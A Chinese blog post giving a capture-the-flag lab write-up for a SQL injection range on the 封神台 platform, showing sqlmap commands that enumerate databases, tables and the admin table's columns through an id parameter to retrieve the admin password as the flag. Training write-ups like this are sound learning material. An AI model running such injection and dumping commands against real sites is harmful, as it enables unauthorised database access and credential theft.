WHCSRL 技术网

【封神台】SQL注入靶场练习(sqlmap)

靶场地址

https://hack.zkaq.cn

题目

在这里插入图片描述

解题过程

1.进入题目
在这里插入图片描述
2.只有个 点击查看新闻,点击进入
在这里插入图片描述
3.发现参数id,肯定就是我们要注入的参数了,先用sqlmap跑一遍

查询数据库
python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dbs
在这里插入图片描述
因为我们需要获得管理员密码,所以要查maoshe数据库
python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --tables -D maoshe
在这里插入图片描述
查admin表
python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --columns -T admin -D maoshe
在这里插入图片描述
查password
在这里插入图片描述
输入flag :hellohack ,正确
在这里插入图片描述

推荐阅读